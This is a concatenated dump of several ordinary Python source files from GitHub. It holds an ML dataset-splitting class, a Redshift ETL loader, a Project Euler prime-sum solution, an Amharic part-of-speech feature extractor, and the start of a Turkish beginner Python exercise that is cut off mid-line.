data_per_label[label]))])\n val_data += l_val_data\n val_labels += [label for _ in range(len(l_val_data))]\n if self._test_split > 0.0:\n l_test_data = (data_per_label[label][int(splits[2]*len(\n data_per_label[label])):len(\n data_per_label[label])])\n test_data += l_test_data\n test_labels += [label for _ in range(len(l_test_data))]\n self._all_data = np.asarray(all_data)\n self._all_labels = np.asarray(all_labels)\n self._train_data = np.asarray(train_data)\n self._train_labels = np.asarray(train_labels)\n self._val_data = np.asarray(val_data)\n self._val_labels = np.asarray(val_labels)\n self._test_data = np.asarray(test_data)\n self._test_labels = np.asarray(test_labels)\n\n if encode_labels:\n self._le = sklearn.preprocessing.LabelEncoder()\n self._le.fit(np.unique(labels))\n self._all_labels = self._le.transform(self._all_labels)\n self._train_labels = self._le.transform(self._train_labels)\n self._test_labels = self._le.transform(self._test_labels)\n self._val_labels = self._le.transform(self._val_labels)\n if to_categorical:\n self._all_labels = keras.utils.to_categorical(\n self._all_labels, num_classes=self._num_classes)\n self._train_labels = keras.utils.to_categorical(\n self._train_labels, num_classes=self._num_classes)\n self._test_labels = keras.utils.to_categorical(\n self._test_labels, num_classes=self._num_classes)\n self._val_labels = keras.utils.to_categorical(\n self._val_labels, num_classes=self._num_classes)\n\n def __call__(self) -> (np.ndarray, np.ndarray):\n \"\"\"\n The calling of a object of this class will return all the dataset,\n including all sets (validation, test and train sets).\n The data and labels returned are transformed by the transformations\n provided in the init method, that is, encoding and shuffling for\n example.\n \n Returns:\n tuple: (data, labels)\n \"\"\"\n return self._all_data, self._all_labels\n\n @property\n def num_classes(self) -> int:\n \"\"\"\n Get the number of classes of this dataset.\n \n Returns:\n int: number of classes\n \"\"\"\n return self._num_classes\n\n @property\n def train(self) -> (np.ndarray, np.ndarray):\n \"\"\"\n Returns the train data.\n \n Returns:\n (np.ndarray, np.ndarray): (data, labels)\n \"\"\"\n return self._train_data, self._train_labels\n\n @property\n def test(self) -> (np.ndarray, np.ndarray):\n \"\"\"\n Returns the test data. It can be None if no test split was provided\n in the init method.\n \n Returns:\n (np.ndarray, np.ndarray): (data, labels)\n \"\"\"\n return self._test_data, self._test_labels\n\n @property\n def validation(self) -> (np.ndarray, np.ndarray):\n \"\"\"\n Returns the validation data. It can be None if no test split was\n provided in the init method.\n \n Returns:\n (np.ndarray, np.ndarray): (data, labels)\n \"\"\"\n return self._val_data, self._val_labels\n\n @property\n def label_encoder(self) -> sklearn.preprocessing.LabelEncoder:\n \"\"\"\n Get the label encoder object for labels transformations.\n This is useful to get the original labels.\n \n Returns:\n sklearn.preprocessing.LabelEncoder: The label encoder object\n \"\"\"\n return self._le\n\n def __str__(self):\n \"\"\"\n Returns the name of the dataset or call the super class method.\n \"\"\"\n if self._name:\n return self._name\n return super().__str__()\n\n def __len__(self):\n \"\"\"\n Returns the size of all data.\n \"\"\"\n return len(self._all_data)\n\nclass TestDataset(Dataset):\n \"\"\"\n A more specific type of Dataset used for a specific test set.\"\n\n Calling the test() method of this object will return all data as the test\n set. It is not possible to split the data.\n \"\"\"\n def __init__(self,\n data,\n labels,\n name=None,\n num_classes=None,\n encode_labels=True,\n to_categorical=True,\n shuffle=True):\n \"\"\"\n Creates a new dataset with the provided data and labels.\n \n Args:\n data (list like): a list like with data or paths\n labels (list like): a list like with the corresponding labels \n name (str, optional): The name of this dataset. Defaults to None.\n encode_labels (bool, optional): Choose to encode labels\n automatically. Defaults to True.\n to_categorical (bool, optional): Choose to convert the labels to\n categorical automatically. Defaults to True.\n shuffle (bool, optional): Choose to shuffle the dataset.\n Defaults to True.\n num_classes (int, optional): Number of classes of this dataset.\n Affects the categorical and encoded labels. If None, it will\n be considered the number of different classes in labels.\n Defaults to None.\n val_split (float, optional): Validation split of this dataset.\n Must be in the range of [0.0, 1.0]. Defaults to 0.0.\n test_split (float, optional): Test split of this dataset.\n Must be in the range of [0.0, 1.0]. Defaults to 0.0.\n \"\"\"\n Dataset.__init__(self,\n data=data,\n labels=labels,\n name=name,\n num_classes=num_classes,\n encode_labels=encode_labels,\n to_categorical=to_categorical,\n shuffle=shuffle)\n\n @property\n def test(self) -> (np.ndarray, np.ndarray):\n \"\"\"\n Returns the test data. \n \n Returns:\n (np.ndarray, np.ndarray): (data, labels)\n \"\"\"\n return super().__call__()\n\n def __str__(self):\n return super().__str__() + '[TestDataset]'","repo_name":"lucasgris/lid-latinoware","sub_path":"common/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":11830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"6685268548","text":"import configparser\nimport psycopg2\nimport re\nimport pandas as pd\nfrom sql_queries import copy_table_queries, insert_table_queries\n\n\ndef load_staging_tables(cur, conn):\n \"\"\"\n Function to load the ST (Stage) tables\n \"\"\"\n for query in copy_table_queries:\n table_name = re.findall(r\"COPY\\ (.+?)\\ from\", query)\n try:\n cur.execute(query)\n conn.commit()\n print(\"'{}' COPY Successful...!!!\".format(table_name[0]))\n except psycopg2.Error as e:\n print(\"Error----->\", e)\n\n\ndef update_users_table(cur, conn, user_ids):\n \"\"\"\n Function to delete the duplicate records in the USERS table\n and insert the latest values of those duplicate user_ids\n (i.e., 'level' update from 'free' to 'paid' )\n \"\"\"\n max_ts = \"\"\" SELECT max_time FROM (SELECT MAX(ts) as max_time, \\\n userId FROM ST_Events WHERE userId IN {} \\\n GROUP BY userId ORDER BY userId)\"\"\".format(\n user_ids\n )\n\n updated_level = \"\"\" SELECT userId,\n firstName,\n lastName,\n gender, level FROM ST_EVENTS \\\n WHERE ts IN ({}) AND userId IN {}\"\"\".format(\n max_ts, user_ids\n )\n\n cur.execute(updated_level)\n recent_level = cur.fetchall()\n\n # Deleting all the user_ids which has duplicates\n print(\"... Deleting duplicates .....\")\n delete_query = \"DELETE FROM users WHERE user_id IN {}\".format(user_ids)\n print(delete_query)\n cur.execute(delete_query)\n conn.commit()\n\n # Inserting the deleted user_ids with the Most Recent data\n users_insert_query = \"INSERT INTO users (user_id, first_name,last_name,gender, level) VALUES (%s, %s,%s,%s, %s)\"\n for row in recent_level:\n cur.execute(users_insert_query, row)\n conn.commit()\n\n\ndef insert_tables(cur, conn):\n \"\"\"\n Function to load the sparkify tables\n \"\"\"\n for query in insert_table_queries:\n table_name = re.findall(r\"INSERT INTO\\ (.+?)\\ \", query)\n try:\n cur.execute(query)\n conn.commit()\n print(\"'{}' Insert Successful...!!!\".format(table_name[0]))\n except psycopg2.Error as e:\n print(e)\n\n query = \"\"\"SELECT user_id FROM (SELECT user_id,count(*) c FROM users GROUP BY user_id ) WHERE c>1\"\"\"\n u_id = pd.read_sql_query(query, conn)\n user_ids = tuple(u_id[\"user_id\"])\n if user_ids:\n print(\"Duplicate records for userIds :\", user_ids)\n update_users_table(cur, conn, user_ids)\n print(\"Inserted with the latest information for the updated users\")\n\n\ndef main():\n \"\"\"\n - Establishes connection with the sparkify database from configuration file and gets cursor to it. \n - Loads the Staging tables\n - Loads other schema tables\n - Finally, closes the connection.\n \"\"\"\n config = configparser.ConfigParser()\n config.read(\"dwh.cfg\")\n\n conn = psycopg2.connect(\n \"host={} dbname={} user={} password={} port={}\".format(\n *config[\"CLUSTER\"].values()\n )\n )\n cur = conn.cursor()\n\n load_staging_tables(cur, conn)\n insert_tables(cur, conn)\n\n conn.close()\n print(\"*************** ETL process completed ***************\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"nandinip92/Data-Engineering-Projects","sub_path":"P3 - Cloud Datawarehousing with AWS/etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":3358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"21940137497","text":"def erato_primes(n):\n divisors = [0 for _ in range(n)]\n divisors[0] = 1\n divisors[1] = 1\n divisors[2] = 0\n primes = []\n for i in range(2, n):\n for j in range(i * 2, n, i):\n divisors[j] = 1\n if divisors[i] == 0:\n primes.append(i)\n return primes\n\nprimes = erato_primes(1000)\n\ns_value = 71\ntarget = s_value\nways = [0] * (target+1)\nways[0] = 1\n\nfor i in range(0, len(primes)):\n for j in range(primes[i], target+1):\n ways[j] += ways[j-primes[i]]\nprint(ways[-1])","repo_name":"A-Dabek/Euler_reactivation","sub_path":"p70s/p77.py","file_name":"p77.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"34019030881","text":"# coding:utf-8\n\nimport codecs\nimport re\n\n# function: open different files\ndef opening(file_name):\n\tf = codecs.open(file_name, 'r', 'utf-8')\n\tarray = [line.strip() for line in f]\n\tf.close()\n\treturn array\n\n# fucnction: opend dictionary\ndef open_dict():\n\tdict = codecs.open('.\\\\used_files\\\\cleaned_dictionary.txt', 'r', 'utf-8')\n\tdictionary = {}\n\tfor line in dict:\n\t\tsplit_line = line.split('\\t')\n\t\tif len(split_line) == 2:\n\t\t\tdictionary[split_line[1]] = split_line[0]\n\t\telse:\n\t\t\ti = 1\n\t\t\twhile i != 8:\n\t\t\t\ttry:\n\t\t\t\t\tdictionary[split_line[i]] = split_line[0]\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\t\t\ti += 1\n\tdict.close()\n\treturn dictionary\n\ndef return_sent(text):\n\ttext = re.sub(u'\\t+', '', text)\n\ttext = re.sub(u'፡፡', u'።', text)\n\ttext = re.sub(u'([.!?።፨፠]|\\r\\n)', u'\\\\1 %%%%', text)\n\tsents = re.split(u'%%%%', text)\n\tfor sent in sents:\n\t\tsent = re.sub(u'[\\r\\n]', '', sent)\n\t\tsent = re.sub(u'(^[.፡ ]+|[.፡ ]+$)', '', sent)\n\t\tif sent == '':\n\t\t\tcontinue\n\t\tsent = '' + sent + ''\n\t\tyield sent\n\n# function: feature extraction\ndef feat_extract(name, text):\n\t# crate file for writing\n\tf_name = name.replace('.txt', '')\n\tfeat_name = u'features_files\\\\' + 'features_' + f_name + '.csv'\n\tw = codecs.open(feat_name, 'w', 'utf-8')\n\n\t# open needed files\n\tdictionary = open_dict()\n\tconsonants = opening('.\\\\used_files\\\\consonants.txt')\n\tvowel_o = opening('.\\\\used_files\\\\vowel_o.txt')\n\tvowel_u = opening('.\\\\used_files\\\\vowel_u.txt')\n\tvowel_e = opening('.\\\\used_files\\\\vowel_e.txt')\n\tvowel_i = opening('.\\\\used_files\\\\vowel_i.txt')\n\tvowel_a = opening('.\\\\used_files\\\\vowel_a.txt')\n\tvowel_ae = opening('.\\\\used_files\\\\vowel_ae.txt')\n\tpronouns = opening('.\\\\used_files\\\\pronouns.txt')\n\tnumerals = opening('.\\\\used_files\\\\numerals.txt')\n\tverbs = opening('.\\\\used_files\\\\verbs.txt')\n\tconjunctions = opening('.\\\\used_files\\\\conjunctions.txt')\n\tadpositions = opening('.\\\\used_files\\\\adpositions.txt')\n\tparticles = opening('.\\\\used_files\\\\particles.txt')\n\tdemonstratives = opening('.\\\\used_files\\\\demonstratives.txt')\n\tquest_pronouns = opening('.\\\\used_files\\\\quest_pronouns.txt')\n\tpersonal_pronouns = opening('.\\\\used_files\\\\pers_pronouns.txt')\n\n\tfreq_dictionary ={}\n\n\t# function: create frequency dictionary\n\tdef freq_dict(word, freq_dictionary = freq_dictionary):\n\t\tif word in freq_dictionary:\n\t\t\tfreq_dictionary[word] += 1\n\t\telse:\n\t\t\tfreq_dictionary[word] = 1\n\n\twords_out = []\n\tthreshold = 0\n\n\t# get features and write in the file\n\twhole_words = 0\n\tnumb_sent = 1\n\tfor sent in return_sent(text):\n\t\twords = re.split(u'[፡ ]+', sent)\n\t\tnumb_word = 1\n\t\tfor actual_word in words:\n\t\t\t# outcomment when clastering\n\t\t\tif threshold == 11500:\n\t\t\t\tbreak\n\t\t\t# add or word in freq_dictionary when clastering\n\t\t\tif actual_word == '':\n\t\t\t\tcontinue\n\t\t\tif actual_word[-1] in u'፣፤፥':\n\t\t\t\tpunct = 1\n\t\t\telse:\n\t\t\t\tpunct = 0\n\n\t\t\tif ';' in actual_word:\n\t\t\t\tactual_word = actual_word.replace(';', '<&***&>')\n\n\t\t\tword = re.sub(u'<.+?>', '', actual_word )\n\t\t\tword = re.sub(u'[-_:;\\'\\\"\\#*«»)(\\]\\[^$@}{‘’><.,?!%፠፡፣፤፥፧።፨፦]', '', word)\n\t\t\tif word == '':\n\t\t\t\tcontinue\n\n\t\t\tactual_word = actual_word + '' + ''\n\n\t\t\t'''\n\t\t\tif word in verbs:\n\t\t\t\tcontinue\n\t\t\tif word in conjunctions:\n\t\t\t\tcontinue\n\t\t\tif word in pronouns:\n\t\t\t\tcontinue\n\t\t\tif word in adpositions:\n\t\t\t\tcontinue\n\t\t\tif re.search('[0-9]', word):\n\t\t\t\tcontinue\n\t\t\tif word in particles:\n\t\t\t\tcontinue\n\t\t\tif word in numerals:\n\t\t\t\tcontinue\n\n\t\t\tif len(word) >= 3 and (word[:2] == u'የዚ' or word[:2] == u'በዚ' or word[:2] == u'ከዚ'):\n\t\t\t\ttry_word = word[2:]\n\t\t\t\tif try_word in demonstratives:\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\ttry_word = u'ይ' + word[2:]\n\t\t\t\t\tif try_word in demonstratives:\n\t\t\t\t\t\tcontinue\n\t\t\tif len(word) >= 2 and (word[0] == u'የ' or word[0] == u'ለ' or word[0] == u'በ'):\n\t\t\t\ttry_word = word[1:]\n\t\t\t\tif try_word in personal_pronouns:\n\t\t\t\t\tcontinue\n\t\t\t\telif len(word) >= 3 and word[:2] == u'ስለ':\n\t\t\t\t\ttry_word = word[2:]\n\t\t\t\t\tif try_word in personal_pronouns:\n\t\t\t\t\t\tcontinue\n\t\t\tif len(word) >= 2 and (word[-1] == u'ኛ' or word[-1] == u'ም'):\n\t\t\t\tchange = [u'ህ', u'ቶ', u'ና', u'ያ', u'ባ', u'ሳ', u'ራ', u'ር', u'ኝ', u'ት', u'ድ']\n\t\t\t\tfor i in change:\n\t\t\t\t\ttry_word = word[:-2] + i\n\t\t\t\t\tif try_word in numerals:\n\t\t\t\t\t\tcontinue\n\t\t\tif len(word) >= 3 and ((word[-2] == u'ኛ' and (word[-1] == u'ው' or word[-1] == u'ዋ' or word[-1] in vowel_u)) or (word[-1] == u'ም' and (word[-2] == u'ው' or word[-2] == u'ዋ' or word[-2] in vowel_u))):\n\t\t\t\ttry_word = word[:-2]\n\t\t\t\tif try_word in quest_pronouns:\n\t\t\t\t\tcontinue\n\t\t\t'''\n\n\n\n\t\t\tw.write(actual_word + ';')\n\t\t\tfreq_dict(word)\n\t\t\twords_out.append(word)\n\n\t\t\t# check punct\n\t\t\tif punct == 1:\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check word length\n\t\t\tw.write(str(len(word)) + ';')\n\n\t\t\t# check first word\n\t\t\tif numb_word == 1:\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check last word\n\t\t\tif numb_word == len(words):\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\tdef check_in(group, word = word, w = w):\n\t\t\t\tif word in group:\n\t\t\t\t\twrite('1;')\n\t\t\t\telse:\n\t\t\t\t\tw.write('0;')\n\n\t\t\t# check plural for nouns\n\t\t\tif len(word) >= 2 and ((word[-1] == u'ች' or word[-1] == u'ቹ') and word[-2] in vowel_o):\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check a definite article\n\t\t\tif len(word) >= 2 and (word[-1] == u'ው' or word[-1] == u'ዋ' or word[-1] in vowel_u or word[-1] == u'ቱ'):\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >= 3 and (word[-2:] == u'ዮዋ' or word[-2:] == u'ዮው'):\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check possessive prefix\n\t\t\tif len(word) >= 2 and word[0] == u'የ':\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check double vowels\n\t\t\tcount = 0\n\t\t\tif len(word) >= 4:\n\t\t\t\tfor i in range(0, len(word) - 1):\n\t\t\t\t\tif word[i] == word[i + 1]:\n\t\t\t\t\t\tw.write('1;')\n\t\t\t\t\t\tcount += 1\n\t\t\t\t\t\tbreak\n\t\t\t\tif count == 0:\n\t\t\t\t\tw.write('0;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check possessive suffix\n\t\t\tif len(word) >= 4:\n\t\t\t\tif word[-1] in vowel_e or word[-1] in vowel_u or word[-1] == u'ው':\n\t\t\t\t\tw.write('1;')\n\t\t\t\telif word[-1] == u'ህ' or word[-1] == u'ህ' or word[-1] == u'ዎ' or word[-1] == u'ዋ':\n\t\t\t\t\tw.write('1;')\n\t\t\t\telif word[-3] in vowel_a and (word[-2:] == u'ቸው' or word[-2:] == u'ችን' or word[-2:] == u'ቸሁ'):\n\t\t\t\t\tw.write('1;')\n\t\t\t\telse:\n\t\t\t\t\tw.write('0;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check verbal past\n\t\t\tif len(word) >= 3 and word[-2] in consonants and (word[-1] == u'ህ' or word[-1] == u'ክ' or word[-1] == u'ሁ'or word[-1] == u'ኩ' or word[-1] == u'ሽ'):\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >= 2 and word[-1] in vowel_u:\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >= 2 and word[-1] in vowel_ae:\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >= 3 and (word[-2] in vowel_ae and word[-1] == u'ች'):\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >= 4 and word[-3:] == u'አችሀ':\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check accusative\n\t\t\tif len(word) >= 2 and word[-1] == u'ን':\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check prepositions\n\t\t\tif len(word) >= 2 and (word[0] == u'በ' or word[0] == u'ባ' or word[0] == u'ከ' or word[0] == u'ካ' or word[0] == u'እ' or word[0] == u'ለ' or word[0] == u'ስ'):\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check object pronoun suffix\n\t\t\tobject_suffixes = [u'ኝ', u'ህ', u'ሽ', u'ው', u'ን']\n\t\t\tif len(word) >=2 and word[-1] in object_suffixes:\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >=3 and word[-2:] == u'ዎት':\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >=3 and word[-2] in vowel_a and word[-1] == u'ት':\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >=4 and word[-3] in vowel_a and (word[-2:] == u'ቸው' or word[-2:] == u'ችሁ' or word[-2:] == u'ቸው' or word[-2:] == u'ችሁ'):\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >=3 and word[-1] == u'ት' and word[-2] in vowel_u:\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check verbal negation\n\t\t\tif len(word) >= 3 and (word[-1] == u'ም' or word[0] == u'አ'):\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check prefix of verbal present-future stem\n\t\t\tif len(word) >= 3 and (word[0] == u'እ' or word[0] == u'ች' or word[0] == u'ይ'):\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check verbal present-future form\n\t\t\tif len(word) >= 4 and word[-3] in vowel_a and (word[-2:] == u'ለሁ' or word[-2:] == u'ለህ' or word[-2:] == u'ለሽ' or word[-2:] == u'ለች' or word[-2:] == u'ለን' or word[-2:] == u'ችሁ'):\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >= 3 and word[-2] in vowel_a and (word[-1] == u'ሉ' or word[-1] == u'ል'):\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check question pronoun\n\t\t\tif word in quest_pronouns:\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >= 3 and ((word[-2] == u'ኛ' and (word[-1] == u'ው' or word[-1] == u'ዋ' or word[-1] in vowel_u)) or (word[-1] == u'ም' and (word[-2] == u'ው' or word[-2] == u'ዋ' or word[-2] in vowel_u))):\n\t\t\t\ttry_word = word[:-2]\n\t\t\t\tif try_word in quest_pronouns:\n\t\t\t\t\tw.write('1;')\n\t\t\t\telse:\n\t\t\t\t\tw.write('0;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check infinitive\n\t\t\tif len(word) >= 2 and word[0] == u'መ':\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >= 2 and word[-1] == u'ት':\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >= 4 and word[:3] == u'አለመ':\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check passive voice\n\t\t\tif len(word) >= 2 and word[0] == u'ተ':\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check place or instrument noun\n\t\t\tmiddle_tongue_a = [u'ቻ', u'ጃ', u'ጫ', u'ኻ', u'ዣ', u'ኛ', u'ያ']\n\t\t\tif len(word) >= 2 and word[-1] in middle_tongue_a:\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check actor noun\n\t\t\tmiddle_tongue = [u'ች', u'ኝ', u'ዥ', u'ጭ', u'ጅ', u'ኽ', u'ይ']\n\t\t\tfront_tongue_i = [u'ቲ', u'ዲ', u'ጢ', u'ሲ', u'ዚ', u'ኪ', u'ሊ']\n\t\t\tif len(word) >= 2 and (word[-1] in middle_tongue or (word[-1] in vowel_i and word[-1] not in front_tongue_i)):\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check causative voice\n\t\t\tif len(word) >= 2 and word[0] == u'አ':\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check attributive form of a verb\n\t\t\tif len(word) >= 3 and (word[0] == u'የ' or word[:2] == u'የም' or word[:2] == u'ያል'):\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check purpose of an action\n\t\t\tif len(word) >= 2 and (word[0] == u'ሌ' or word[0] == u'ለ'):\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check adverbial participle\n\t\t\tif len(word) >= 3 and (word[-1] in vowel_e or word[-1] in vowel_a or word[-1] in vowel_o or ((word[-1] == u'ህ' or word[-1] == u'ሽ' or word[-1] == u'ሽ') and word[-2] in vowel_ae)):\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >= 4 and ((word[-2:] == u'ችሁ' and word[-3] in vowel_a) or (word[-2] in vowel_o and word[-1] == u'ው')):\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >= 3 and word[:2] == u'በመ':\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >= 3 and (word[:2] == u'እየ' and (word[-1] == u'ሁ' or word[-1] == u'ህ' or word[-1] == u'ሽ' or word[-1] in vowel_ae or word[-1] in vowel_u)):\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >= 4 and (word[:2] == u'እየ' and ((word[-2:] == u'ችሁ' and word[-3] in vowel_a) or (word[-1] == u'ች' and word[-2] in vowel_ae) or (word[-1] == u'ን' and word[-2] in consonants))):\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >= 3 and (word[:2] == u'ስት' or word[:2] == u'ስን' or word[0] == u'ሲ'):\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\tif word[-1] == u'ም':\n\t\t\t\tif len(word) >= 4 and (word[-2] in vowel_e or word[-2] in vowel_a or word[-2] in vowel_o or ((word[-2] == u'ህ' or word[-2] == u'ሽ' or word[-2] == u'ሽ') and word[-3] in vowel_ae)):\n\t\t\t\t\tw.write('1;')\n\t\t\t\telif len(word) >= 5 and ((word[-3:] == u'ችሁ' and word[-4] in vowel_a) or (word[-3] in vowel_o and word[-2] == u'ው')):\n\t\t\t\t\tw.write('1;')\n\t\t\t\telif len(word) >= 4 and (word[:2] == u'እየ' and (word[-2] == u'ሁ' or word[-2] == u'ህ' or word[-2] == u'ሽ' or word[-2] in vowel_ae or word[-2] in vowel_u)):\n\t\t\t\t\tw.write('1;')\n\t\t\t\telif len(word) >= 5 and (word[:2] == u'እየ' and ((word[-3:] == u'ችሁ' and word[-4] in vowel_a) or (word[-2] == u'ች' and word[-2] in vowel_ae) or (word[-2] == u'ን' and word[-3] in consonants))):\n\t\t\t\t\tw.write('1;')\n\t\t\t\telse:\n\t\t\t\t\tw.write('0;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check analytic form\n\t\t\tif u'አለሁ' in word or u'አለች' in word or u'አል' in word:\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >= 4 and (((word[-2:] == u'ለሁ' or word[-2:] == u'ለች') and word[-3] in vowel_a) or (word[-1] == u'ል' and word[-2] in vowel_a)):\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check order\n\t\t\tif len(word) >= 2 and (word[-1] in consonants or word[-1] in vowel_i or word[-1] in vowel_u):\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check wish\n\t\t\tif len(word) >= 4 and (word[-1] in consonants or word[-1] in vowel_u) and (word[0] == u'ል' or word[0] == u'ይ' or word[0] == u'ት' or word[:2] == u'እን'):\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check subordinate of clause\n\t\t\tif len(word) >= 3 and (word[:2] == u'ስለ' or word[:3] == u'ስለም'):\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check noun suffix\n\t\t\tif len(word) >= 3 and ((word[-1] == u'ኛ' and (word[-2] in vowel_ae or word[-2] in consonants)) or ((word[-2:] == u'ነት' or word[-1] == u'ታ') and word[-2] in consonants)):\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check noun/adjective prefix\n\t\t\tif len(word) >= 3 and (word[:2] == u'ባለ' or word[:2] == u'ሰረ'):\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check adjective suffix\n\t\t\tif len(word) >= 3 and (((word[-1] == u'ም' or word[-1] == u'ማ' or word[-1] == u'ዊ') and word[-2] in vowel_a) or (word[-1] == u'ኛ' and (word[-2] in vowel_ae or word[-2] in consonants))):\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check adverb prefix\n\t\t\tif len(word) >= 2 and (word[0] == u'በ' or word[0] == u'ለ' or word[:3] == u'እንደ' or word[:3] == u'በስተ' or word[:2] == u'ያለ' or word[:2] == u'በየ' or word[:3] == u'እስከ' or word[:3] == u'ከዎደ'):\n\t\t\t\tw.write('1')\n\t\t\telse:\n\t\t\t\tw.write('0')\n\n\t\t\tw.write('\\n')\n\t\t\tnumb_word += 1\n\t\t\tthreshold += 1\n\t\tnumb_sent += 1\n\t\twhole_words += numb_word\n\tw.close()\n\treturn feat_name, freq_dictionary, words_out, numb_sent, whole_words\n\n\n\n","repo_name":"maobedkova/AmharicCorpus","sub_path":"pos-tagger/features_extractor_3.py","file_name":"features_extractor_3.py","file_ext":"py","file_size_in_byte":14231,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"91"}
+{"seq_id":"1412053478","text":"import seaborn as sns\n\n# Görev 1: Verilen değerlerin veri yapılarını inceleyiniz.\n\n\nx = 8\ny = 3.2\nz = 8j + 18\na = \"hello world\"\nb = True\nc = 23 < 22\nl = [1,2,3,4]\nd = {\"Name\":\"Jake\",\n \"Age\":27,\n \"Adress\":\"Downtown\"}\nt = (\"Machine Learning\",\"Data Science\")\ns = {\"Python\",\"Machine Learning\",\"Data Science\"}\n\nprint(type(x), type(y), type(z), type(a), type(b), type(c), type(l), type(d), type(t), type(s))\n\n\n# Görev 2: Verilen string ifadenin tüm harflerini büyük harfe çeviriniz.\n# Virgül ve nokta yerine space koyunuz, kelime kelime ayırınız\n\ntext = \"The goal is to turn data into information, and information into insight.\"\n\nTEXT = text.upper()\nprint(TEXT)\n\nTEXT = TEXT.replace(\",\",\"\")\nTEXT = TEXT.replace(\".\",\"\")\nTEXT = TEXT.split(\" \")\nprint(TEXT)\n\n\n# Görev 3: Verilen listeye aşağıdaki adımları uygulayınız.\n# Adım1: Verilen listenin eleman sayısına bakınız.\n# Adım2: Sıfırıncı ve onuncu indeksteki elemanları çağırınız.\n# Adım3: Verilen liste üzerinden [\"D\", \"A\", \"T\", \"A\"] listesi oluşturunuz.\n# Adım4: Sekizinci indeksteki elemanı siliniz.\n# Adım5: Yeni bir eleman ekleyiniz.\n# Adım6: Sekizinci indekse \"N\" elemanını tekrar ekleyiniz.\n\nlst = 